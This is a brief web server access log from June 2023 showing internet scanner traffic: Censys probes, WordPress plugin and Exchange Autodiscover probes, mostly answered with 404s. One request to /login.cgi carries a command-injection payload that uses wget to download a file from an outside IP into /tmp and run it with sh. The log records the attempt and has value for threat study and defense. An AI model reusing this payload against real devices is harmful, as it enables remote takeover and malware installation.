- - [25/Jun/2023:00:29:13 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.248.133.34 - - [25/Jun/2023:00:29:13 +0200] "PRI * HTTP/2.0" 400 383 "-" "-" 167.248.133.34 - - [25/Jun/2023:00:29:13 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.248.133.34 - - [25/Jun/2023:00:29:13 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 180.149.125.170 - - [25/Jun/2023:00:39:50 +0200] "GET /c/ HTTP/1.1" 404 278 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36" 138.91.90.90 - - [25/Jun/2023:01:07:06 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://1.116.115.169/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0" 188.120.255.35 - - [25/Jun/2023:01:09:37 +0200] "GET /wp-content/plugins/td-cloud-library/assets/css/tdb_wp_admin_taxonomies.css HTTP/1.1" 404 426 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Mobile/15E148 Safari/604.1" 83.97.73.89 - - [25/Jun/2023:01:43:09 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"